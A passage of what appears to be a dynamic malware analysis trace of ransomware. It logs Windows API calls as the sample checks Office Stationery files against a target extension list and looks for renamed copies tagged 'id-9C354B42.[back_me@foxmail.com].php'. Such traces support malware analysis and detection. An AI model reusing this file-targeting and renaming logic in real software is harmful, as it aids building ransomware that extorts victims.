Shared\\Stationery\\Desktop.ini") returned 69 [0043.301] lstrlenW (lpString=".dbf") returned 4 [0043.301] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0043.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0043.301] lstrlenW (lpString=".1cd") returned 4 [0043.301] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0043.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0043.301] lstrlenW (lpString=".jpg") returned 4 [0043.301] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0043.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0043.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0043.301] lstrlenW (lpString=".doc") returned 4 [0043.301] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0043.301] lstrlenW (lpString=".docx") returned 5 [0043.301] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0043.301] lstrlenW (lpString=".pdf") returned 4 [0043.301] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0043.301] lstrlenW (lpString=".xls") returned 4 [0043.301] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0043.301] lstrlenW (lpString=".xlsx") returned 5 [0043.301] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0043.301] lstrlenW (lpString=".ppt") returned 4 [0043.301] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0043.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0043.301] lstrlenW (lpString=".zip") returned 4 [0043.301] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0043.301] lstrlenW (lpString=".rar") returned 4 [0043.301] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0043.301] lstrlenW (lpString=".bz2") returned 4 [0043.301] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0043.301] lstrlenW (lpString=".7z") returned 3 [0043.301] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0043.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0043.302] lstrlenW (lpString=".dbf") returned 4 [0043.302] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0043.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0043.302] lstrlenW (lpString=".1cd") returned 4 [0043.302] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0043.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0043.302] lstrlenW (lpString=".jpg") returned 4 [0043.302] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0043.302] lstrcmpiW (lpString1=".emf", lpString2=".php") returned -1 [0043.302] lstrlenW (lpString="Dotted_Lines.emf") returned 16 [0043.302] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0043.302] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=3792) returned 1 [0043.302] CloseHandle (hObject=0x214) returned 1 [0043.302] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf")) returned 0x20 [0043.302] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0043.302] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0043.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0043.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0043.303] lstrlenW (lpString=".doc") returned 4 [0043.303] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0043.303] lstrlenW (lpString=".docx") returned 5 [0043.303] lstrcmpiW (lpString1=".docx", lpString2="s.emf") returned -1 [0043.303] lstrlenW (lpString=".pdf") returned 4 [0043.303] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0043.303] lstrlenW (lpString=".xls") returned 4 [0043.303] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0043.303] lstrlenW (lpString=".xlsx") returned 5 [0043.303] lstrcmpiW (lpString1=".xlsx", lpString2="s.emf") returned -1 [0043.303] lstrlenW (lpString=".ppt") returned 4 [0043.303] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0043.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0043.303] lstrlenW (lpString=".zip") returned 4 [0043.303] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0043.303] lstrlenW (lpString=".rar") returned 4 [0043.303] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0043.303] lstrlenW (lpString=".bz2") returned 4 [0043.303] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0043.303] lstrlenW (lpString=".7z") returned 3 [0043.303] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0043.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0043.303] lstrlenW (lpString=".dbf") returned 4 [0043.303] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0043.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0043.303] lstrlenW (lpString=".1cd") returned 4 [0043.303] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0043.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0043.303] lstrlenW (lpString=".jpg") returned 4 [0043.303] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0043.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0043.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0043.304] lstrlenW (lpString=".doc") returned 4 [0043.304] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0043.304] lstrlenW (lpString=".docx") returned 5 [0043.304] lstrcmpiW (lpString1=".docx", lpString2="s.emf") returned -1 [0043.304] lstrlenW (lpString=".pdf") returned 4 [0043.304] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0043.304] lstrlenW (lpString=".xls") returned 4 [0043.304] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0043.304] lstrlenW (lpString=".xlsx") returned 5 [0043.304] lstrcmpiW (lpString1=".xlsx", lpString2="s.emf") returned -1 [0043.304] lstrlenW (lpString=".ppt") returned 4 [0043.304] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0043.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0043.304] lstrlenW (lpString=".zip") returned 4 [0043.304] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0043.304] lstrlenW (lpString=".rar") returned 4 [0043.304] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0043.304] lstrlenW (lpString=".bz2") returned 4 [0043.304] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0043.304] lstrlenW (lpString=".7z") returned 3 [0043.304] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0043.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0043.304] lstrlenW (lpString=".dbf") returned 4 [0043.304] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0043.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0043.304] lstrlenW (lpString=".1cd") returned 4 [0043.304] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0043.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0043.304] lstrlenW (lpString=".jpg") returned 4 [0043.304] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0043.305] lstrcmpiW (lpString1=".htm", lpString2=".php") returned -1 [0043.305] lstrlenW (lpString="Garden.htm") returned 10 [0043.305] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0043.305] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=231) returned 1 [0043.305] CloseHandle (hObject=0x214) returned 1 [0043.305] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm")) returned 0x20 [0043.305] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0043.305] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0043.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0043.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0043.305] lstrlenW (lpString=".doc") returned 4 [0043.305] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0043.305] lstrlenW (lpString=".docx") returned 5 [0043.305] lstrcmpiW (lpString1=".docx", lpString2="n.htm") returned -1 [0043.305] lstrlenW (lpString=".pdf") returned 4 [0043.305] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0043.305] lstrlenW (lpString=".xls") returned 4 [0043.305] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0043.305] lstrlenW (lpString=".xlsx") returned 5 [0043.305] lstrcmpiW (lpString1=".xlsx", lpString2="n.htm") returned -1 [0043.305] lstrlenW (lpString=".ppt") returned 4 [0043.306] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0043.306] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0043.306] lstrlenW (lpString=".zip") returned 4 [0043.306] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0043.306] lstrlenW (lpString=".rar") returned 4 [0043.306] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0043.306] lstrlenW (lpString=".bz2") returned 4 [0043.306] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0043.306] lstrlenW (lpString=".7z") returned 3 [0043.306] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0043.306] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0043.306] lstrlenW (lpString=".dbf") returned 4 [0043.306] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0043.306] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0043.306] lstrlenW (lpString=".1cd") returned 4 [0043.306] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0043.306] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0043.306] lstrlenW (lpString=".jpg") returned 4 [0043.306] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0043.306] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0043.306] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0043.306] lstrlenW (lpString=".doc") returned 4 [0043.306] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0043.306] lstrlenW (lpString=".docx") returned 5 [0043.306] lstrcmpiW (lpString1=".docx", lpString2="n.htm") returned -1 [0043.306] lstrlenW (lpString=".pdf") returned 4 [0043.306] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0043.306] lstrlenW (lpString=".xls") returned 4 [0043.306] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0043.306] lstrlenW (lpString=".xlsx") returned 5 [0043.306] lstrcmpiW (lpString1=".xlsx", lpString2="n.htm") returned -1 [0043.306] lstrlenW (lpString=".ppt") returned 4 [0043.306] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0043.306] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0043.307] lstrlenW (lpString=".zip") returned 4 [0043.307] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0043.307] lstrlenW (lpString=".rar") returned 4 [0043.307] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0043.307] lstrlenW (lpString=".bz2") returned 4 [0043.307] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0043.307] lstrlenW (lpString=".7z") returned 3 [0043.307] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0043.307] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0043.307] lstrlenW (lpString=".dbf") returned 4 [0043.307] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0043.307] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0043.307] lstrlenW (lpString=".1cd") returned 4 [0043.307] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0043.307] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0043.307] lstrlenW (lpString=".jpg") returned 4 [0043.307] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0043.307] lstrcmpiW (lpString1=".jpg", lpString2=".php") returned -1 [0043.307] lstrlenW (lpString="Garden.jpg") returned 10 [0043.307] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0043.308] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=23871) returned 1 [0043.308] CloseHandle (hObject=0x214) returned 1 [0043.308] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg")) returned 0x20 [0043.308] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0043.308] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0043.308] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0043.308] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0043.308] lstrlenW (lpString=".doc") returned 4 [0043.308] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0043.308] lstrlenW (lpString=".docx") returned 5 [0043.308] lstrcmpiW (lpString1=".docx", lpString2="n.jpg") returned -1 [0043.308] lstrlenW (lpString=".pdf") returned 4 [0043.308] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0043.308] lstrlenW (lpString=".xls") returned 4 [0043.308] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0043.308] lstrlenW (lpString=".xlsx") returned 5 [0043.308] lstrcmpiW (lpString1=".xlsx", lpString2="n.jpg") returned -1 [0043.308] lstrlenW (lpString=".ppt") returned 4 [0043.308] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0043.308] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0043.308] lstrlenW (lpString=".zip") returned 4 [0043.308] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0043.308] lstrlenW (lpString=".rar") returned 4 [0043.309] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0043.309] lstrlenW (lpString=".bz2") returned 4 [0043.309] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0043.309] lstrlenW (lpString=".7z") returned 3 [0043.309] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0043.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0043.309] lstrlenW (lpString=".dbf") returned 4 [0043.309] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0043.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0043.309] lstrlenW (lpString=".1cd") returned 4 [0043.309] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0043.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0043.309] lstrlenW (lpString=".jpg") returned 4 [0043.309] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0043.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0043.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0043.309] lstrlenW (lpString=".doc") returned 4 [0043.309] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0043.309] lstrlenW (lpString=".docx") returned 5 [0043.309] lstrcmpiW (lpString1=".docx", lpString2="n.jpg") returned -1 [0043.309] lstrlenW (lpString=".pdf") returned 4 [0043.309] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0043.309] lstrlenW (lpString=".xls") returned 4 [0043.309] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0043.309] lstrlenW (lpString=".xlsx") returned 5 [0043.309] lstrcmpiW (lpString1=".xlsx", lpString2="n.jpg") returned -1 [0043.309] lstrlenW (lpString=".ppt") returned 4 [0043.309] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0043.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0043.309] lstrlenW (lpString=".zip") returned 4 [0043.309] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0043.309] lstrlenW (lpString=".rar") returned 4 [0043.309] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0043.309] lstrlenW (lpString=".bz2") returned 4 [0043.309] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0043.310] lstrlenW (lpString=".7z") returned 3 [0043.310] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0043.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0043.310] lstrlenW (lpString=".dbf") returned 4 [0043.310] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0043.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0043.310] lstrlenW (lpString=".1cd") returned 4 [0043.310] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0043.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0043.310] lstrlenW (lpString=".jpg") returned 4 [0043.310] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0043.310] lstrcmpiW (lpString1=".emf", lpString2=".php") returned -1 [0043.310] lstrlenW (lpString="Genko_1.emf") returned 11 [0043.310] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0043.312] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=5524) returned 1 [0043.312] CloseHandle (hObject=0x214) returned 1 [0043.312] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf")) returned 0x20 [0043.312] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0043.312] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0043.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0043.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0043.313] lstrlenW (lpString=".doc") returned 4 [0043.313] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0043.313] lstrlenW (lpString=".docx") returned 5 [0043.313] lstrcmpiW (lpString1=".docx", lpString2="1.emf") returned -1 [0043.313] lstrlenW (lpString=".pdf") returned 4 [0043.313] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0043.313] lstrlenW (lpString=".xls") returned 4 [0043.313] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0043.313] lstrlenW (lpString=".xlsx") returned 5 [0043.313] lstrcmpiW (lpString1=".xlsx", lpString2="1.emf") returned -1 [0043.313] lstrlenW (lpString=".ppt") returned 4 [0043.313] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0043.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0043.313] lstrlenW (lpString=".zip") returned 4 [0043.313] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0043.313] lstrlenW (lpString=".rar") returned 4 [0043.313] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0043.313] lstrlenW (lpString=".bz2") returned 4 [0043.313] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0043.313] lstrlenW (lpString=".7z") returned 3 [0043.313] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0043.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0043.313] lstrlenW (lpString=".dbf") returned 4 [0043.313] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0043.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0043.313] lstrlenW (lpString=".1cd") returned 4 [0043.313] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0043.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0043.313] lstrlenW (lpString=".jpg") returned 4 [0043.313] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0043.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0043.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0043.313] lstrlenW (lpString=".doc") returned 4 [0043.313] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0043.314] lstrlenW (lpString=".docx") returned 5 [0043.314] lstrcmpiW (lpString1=".docx", lpString2="1.emf") returned -1 [0043.314] lstrlenW (lpString=".pdf") returned 4 [0043.314] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0043.314] lstrlenW (lpString=".xls") returned 4 [0043.314] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0043.314] lstrlenW (lpString=".xlsx") returned 5 [0043.314] lstrcmpiW (lpString1=".xlsx", lpString2="1.emf") returned -1 [0043.314] lstrlenW (lpString=".ppt") returned 4 [0043.314] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0043.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0043.314] lstrlenW (lpString=".zip") returned 4 [0043.314] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0043.314] lstrlenW (lpString=".rar") returned 4 [0043.314] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0043.314] lstrlenW (lpString=".bz2") returned 4 [0043.314] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0043.314] lstrlenW (lpString=".7z") returned 3 [0043.314] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0043.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0043.314] lstrlenW (lpString=".dbf") returned 4 [0043.314] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0043.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0043.314] lstrlenW (lpString=".1cd") returned 4 [0043.314] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0043.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0043.314] lstrlenW (lpString=".jpg") returned 4 [0043.314] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0043.314] lstrcmpiW (lpString1=".emf", lpString2=".php") returned -1 [0043.314] lstrlenW (lpString="Genko_2.emf") returned 11 [0043.315] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0043.315] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=10340) returned 1 [0043.315] 